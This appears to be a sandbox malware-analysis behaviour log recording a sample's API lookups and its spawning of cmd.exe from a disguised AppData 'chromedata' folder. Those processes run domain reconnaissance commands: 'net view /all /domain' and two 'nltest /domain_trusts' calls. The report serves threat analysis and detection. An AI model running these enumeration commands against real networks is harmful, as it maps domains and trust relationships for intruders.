Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _initterm, address_out = 0x76f8c151	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _iob, address_out = 0x77022900	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _lock, address_out = 0x76f8a449	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _onexit, address_out = 0x76f9112d	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _snwprintf_s, address_out = 0x76f9141b	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = calloc, address_out = 0x76f8c456	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = fputc, address_out = 0x76ff87c3	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = free, address_out = 0x76f89894	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = fwrite, address_out = 0x76f976ac	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = getenv, address_out = 0x76f9a419	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = localeconv, address_out = 0x76f906a8	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = malloc, address_out = 0x76f89cee	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = memcpy, address_out = 0x76f89910	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = memset, address_out = 0x76f89790	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = setlocale, address_out = 0x76f95286	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = strchr, address_out = 0x76f8dbeb	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = strerror, address_out = 0x76fa7a18	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = strlen, address_out = 0x76f943d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = strncmp, address_out = 0x76f8b443	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = strncpy, address_out = 0x76f908a9	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = strstr, address_out = 0x76f8de4a	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _unlock, address_out = 0x76f8a42d	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = abort, address_out = 0x76fe8e53	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = atoi, address_out = 0x76f8dbe0	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = vfprintf, address_out = 0x76ff7408	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = wcslen, address_out = 0x76f9d335	1	Fn
Module	Load	module_name = NETAPI32.dll, base_address = 0x73c20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\netapi32.dll, function = NetApiBufferFree, address_out = 0x73c113d2	1	Fn
Module	Get Address	module_name = c:\windows\system32\netapi32.dll, function = NetServerEnum, address_out = 0x6f692f61	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x76cd0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoInitialize, address_out = 0x76ceb636	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x76d186d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = IIDFromString, address_out = 0x76ce2ff2	1	Fn
Module	Load	module_name = OLEAUT32.dll, base_address = 0x76a60000	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = VariantClear, address_out = 0x76a63eae	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x76c00000	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = wvsprintfW, address_out = 0x76c2407a	1	Fn
Module	Load	module_name = WS2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = WSAGetLastError, address_out = 0x75a937ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = WSAStartup, address_out = 0x75a93ab2	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = __WSAFDIsSet, address_out = 0x75a96a8a	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = closesocket, address_out = 0x75a93918	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = connect, address_out = 0x75a96bdd	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = gethostbyname, address_out = 0x75aa7673	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = htons, address_out = 0x75a92d8b	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = inet_addr, address_out = 0x75a9311b	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = inet_ntoa, address_out = 0x75a9b131	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = ioctlsocket, address_out = 0x75a93084	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = recv, address_out = 0x75a96b0e	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = select, address_out = 0x75a96989	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = send, address_out = 0x75a96f01	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = setsockopt, address_out = 0x75a941b6	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = socket, address_out = 0x75a93eb8	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:05 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11084198	1	Fn
System	Get Time	type = Performance Ctr, time = 31421778633	1	Fn

Thread 0xe28

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = SystemRoot, result_out = C:\Windows	1	Fn
Module	Get Handle	module_name = c:\windows\system32\msvcrt.dll, base_address = 0x76f80000	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _get_output_format, address_out = 0x76ff5cb8	1	Fn

Process #54: cmd.exe

Information	Value
ID	#54
File Name	c:\windows\system32\cmd.exe
Command Line	/c net view /all /domain
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:04:09, Reason: Child Process
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:00:07

OS Process Information

Information	Value
PID	0xd70
Parent PID	0xa70 (c:\windows\system32\svchost.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x DA4

Threads

Thread 0xda4

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:34:14 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11093215	1	Fn
System	Get Time	type = Performance Ctr, time = 32322151602	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49df0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 232, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\net.exe, os_pid = 0xed4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #56: cmd.exe

Information	Value
ID	#56
File Name	c:\windows\system32\cmd.exe
Command Line	/c nltest /domain_trusts
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:04:09, Reason: Child Process
Unmonitor	End Time: 00:04:11, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0xed0
Parent PID	0xa70 (c:\windows\system32\svchost.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x EC8

Threads

Thread 0xec8

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:34:14 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11093402	1	Fn
System	Get Time	type = Performance Ctr, time = 32340853442	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49df0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 232, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\nltest.exe, os_pid = 0xee8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #58: cmd.exe

Information	Value
ID	#58
File Name	c:\windows\system32\cmd.exe
Command Line	/c nltest /domain_trusts /all_trusts
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:04:09, Reason: Child Process
Unmonitor	End Time: 00:04:11, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0xf1c
Parent PID	0xa70 (c:\windows\system32\svchost.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x F10

Threads

Thread 0xf10

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:34:15 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11093652	1	Fn
System	Get Time	type = Performance Ctr, time = 32381713498	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49df0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 192, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\nltest.exe, os_pid = 0x944, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Remarks (2/3)

Remarks

Monitored Processes

Behavior Information - Sequential View

Before

After